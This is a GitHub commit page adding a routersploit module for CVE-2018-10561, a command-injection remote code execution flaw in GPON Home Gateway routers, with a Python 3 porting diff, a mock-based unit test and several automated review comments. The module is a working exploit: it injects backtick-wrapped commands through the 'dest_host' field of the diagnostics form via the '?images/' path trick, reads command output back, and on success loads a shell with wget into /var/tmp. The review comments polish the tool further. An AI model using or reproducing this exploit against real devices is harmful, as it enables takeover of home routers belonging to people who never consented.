Unverified Commit b251580d by Marcin Bury Committed by GitHub

Adding exploit for CVE-2018-10561 - GPON Home Gateway RCE (#394)

parent f9d52917
import socket
import telnetlib
import binascii
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading
import time
......@@ -270,7 +271,7 @@ class Communication(object):
echo_max_length = 30
size = len(self.payload)
num_parts = (size / echo_max_length) + 1
num_parts = int(size / echo_max_length) + 1
# transfer binary through echo command
print_status("Sending payload to {}".format(path))
......@@ -278,7 +279,7 @@ class Communication(object):
current = i * echo_max_length
print_status("Transferring {}/{} bytes".format(current, len(self.payload)))
block = self.payload[current:current + echo_max_length].encode("hex")
block = str(binascii.hexlify(self.payload[current:current + echo_max_length]), "utf-8")
block = echo_prefix + echo_prefix.join(a + b for a, b in zip(block[::2], block[1::2]))
cmd = echo_stream.format(block, path)
self.exploit.execute(cmd)
......
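Review bot: `num_parts = int(size / echo_max_length) + 1` in the first `Communication` hunk still over-counts by one whenever `size` is an exact multiple of 30 (60 bytes gives 3 parts), so the loop that presumably iterates `range(num_parts)` sends a trailing empty block; the Python 2 original had the same off-by-one and the port only preserves it. A ceiling division avoids both the float round-trip and the empty part: `num_parts = -(-size // echo_max_length)`. In the second hunk, `binascii.hexlify` assumes `self.payload` is now `bytes` and raises `TypeError` on a `str`, which the caller presumably guarantees after the Python 3 port — worth a one-line comment at the top of the method, e.g. `# self.payload must be bytes; hexlify rejects str`. The enclosing method starts before and ends after both hunks.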
import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "GPON Home Gateway RCE",
"description": "Module exploits GPON Home Gatewa command injection vulnerability, that allows "
"executing commands on operating system level.",
"authors": (
"VPNMentor", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
"https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/",
),
"devices": (
"GPON Home Gateway",
),
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(8080, "Target HTTP port")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
shell(self, architecture="mipsbe", method="wget", location="/var/tmp/")
else:
print_error("Exploit failed - target does not seem to be vulnerable")
def execute(self, cmd):
payload = "`{cmd}`;{cmd}".format(cmd=cmd)
data = {
"XWebPageName": "diag",
"diag_action": "ping",
"wan_conlist": "0",
"dest_host": payload,
"ipv": "0"
}
self.http_request(
method="POST",
path="/GponForm/diag_Form?images/",
data=data
)
response = self.http_request(
method="GET",
path="/diag.html?images/"
)
if response:
res = re.findall(r"diag_result = \"(.*?)\\nNo traceroute test.", response.text)
if res:
return res[0].replace("\\n", "\n")
return ""
@mute
def check(self):
mark = utils.random_text(12)
cmd = "echo {}".format(mark)
response = self.execute(cmd)
if mark in response:
return True # target is vulnerable
return False # target is not vulnerable
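Review bot: The `description` string in `__info__` misspells the device name (`"Module exploits GPON Home Gatewa command injection vulnerability, that allows "`), and `references` lists only the vendor write-up even though the commit title names CVE-2018-10561; the CVE identifier belongs in the module metadata so the module can be located by id. In `execute`, the result of the POST is discarded, so when the target never answers the first request the GET still runs and the method silently returns `""`; guarding with `if not self.http_request(method="POST", path="/GponForm/diag_Form?images/", data=data): return ""` makes the failure explicit before the second round-trip (assuming `http_request` returns a falsy value on failure, as the later `if response:` suggests). `re.findall(...)` followed by `res[0]` reads more directly as `m = re.search(...)` with `return m.group(1).replace("\\n", "\n") if m else ""`. `check` also lacks a docstring; `"""Echo a random marker through execute() and report whether it appears in diag_result."""` states its contract.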
from unittest import mock
from flask import request
from routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce import Exploit
mark = ""
def apply_response1(*args, **kwargs):
global mark
mark = request.form["dest_host"]
return "Test", 200
def apply_response2(*args, **kwargs):
global mark
response = "diag_result = \"{}\\nNo traceroute test.".format(mark)
print(response)
return response, 200
@mock.patch("routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce.shell")
def test_check_success(mocked_shell, target):
""" Test scenario - successful check """
route_mock1 = target.get_route_mock("/GponForm/diag_Form", methods=["POST"])
route_mock1.side_effect = apply_response1
route_mock2 = target.get_route_mock("/diag.html", methods=["GET"])
route_mock2.side_effect = apply_response2
exploit = Exploit()
exploit.target = target.host
exploit.port = target.port
assert exploit.check()
assert exploit.run() is None
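Review bot: `apply_response2` declares `global mark` although it only reads the name, and `print(response)` looks like leftover debugging output in a test helper; both lines can be dropped. The module-level `mark` is shared mutable state between the two route handlers, so the test depends on `apply_response1` running before `apply_response2` in the same process — acceptable here, but a comment on `mark = ""` such as `# captured by the POST handler, echoed back by the GET handler` would make that ordering explicit. `mocked_shell` is received but never asserted on; `mocked_shell.assert_called_once()` after `exploit.run()` would pin that the success path actually reaches `shell`. Only the success path is covered; a companion test whose GET handler returns a `diag_result` without the marker would pin `check()` returning `False` and `run()` not calling `shell`.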